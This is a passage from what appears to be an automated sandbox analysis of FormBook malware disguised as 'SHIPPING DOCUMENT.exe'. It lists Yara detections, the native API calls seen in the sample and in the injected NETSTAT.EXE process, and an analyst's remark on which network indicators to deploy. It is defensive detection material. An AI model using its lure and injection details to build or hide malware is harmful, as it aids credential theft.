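Blocking the decoy domains wholesale is a poor control: they are ordinary third-party sites (the sedo.com parking string found in NETSTAT.EXE memory names fuerzaagavera.com). The path-plus-parameter structure, the kind of shape the ET FormBook check-in rules above fire on, travels with the build and is the indicator worth deploying, alongside the real C2 host from the configuration.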

E-Banking Fraud:

Yara detected FormBook
Source: the same 14 Yara matches (8 memory dumps, 6 unpacked PEs) listed under AV Detection above.

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)
          Source: SHIPPING DOCUMENT.exe | Static file information: Suspicious name
          Initial sample is a PE file and has a suspicious name
          Source: initial sample | Static PE information: Filename: SHIPPING DOCUMENT.exe
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419D60 NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419E10 NtReadFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419E90 NtClose
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419F40 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419D5A NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419E0A NtReadFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419E8A NtClose
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00419F3A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B098F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B099A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B095D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B096E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B098A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09820 NtEnumerateKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B0B040 NtSuspendThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B099D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09950 NtQueueApcThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09A10 NtQuerySection
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B0A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09B00 NtSetValueKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B095F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B0AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09560 NtWriteFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B096D0 NtCreateKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09650 NtQueryValueKey
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B0A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09770 NtSetInformationFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B0A770 NtOpenThread
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B09760 NtOpenProcess
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_00419D60 NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_00419E10 NtReadFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_00419E90 NtClose
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_00419F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039096D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039096E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039099A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039095D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0390A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039097A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0390A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0390A770 NtOpenThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909760 NtOpenProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909A10 NtQuerySection
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909A20 NtResumeThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039099D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039095F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0390AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909560 NtWriteFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039098A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039098F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03909820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0390B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9E90 NtClose
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9E10 NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9F40 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9D60 NtCreateFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9E8A NtClose
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9E0A NtReadFile
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9F3A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DD9D5A NtCreateFile
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 0_2_00406925
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_0041DA2A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_0041BDC4
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00409E40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_0041D6DF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_0041DFA3
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B920A8
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00ADB090
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B81002
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00ACF900
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B922AE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00AFEBB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B8DBD2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B92B28
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00AD841F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00ADD5E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00AC0D20
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B92D07
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B91D55
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B92EF7
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00AE6E30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_2_00B91FF1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: 1_1_0041DA2A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038FEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_0398DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03991FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03992B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039922AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03992EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038E6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038CF900
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03992D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038C0D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03991D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038DB090
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_039920A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_038D841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_03981002
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DDE1FC
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DC9E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DC9E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DC2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DDDFA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DDBDC4
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 8_2_02DC2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: String function: 038CB150 appears 35 times
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exe | Code function: String function: 00ACB150 appears 35 times
          Source: SHIPPING DOCUMENT.exe, 00000000.00000003.653383612.000000000338F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700777505.0000000000D4F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamenetstat.exej% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
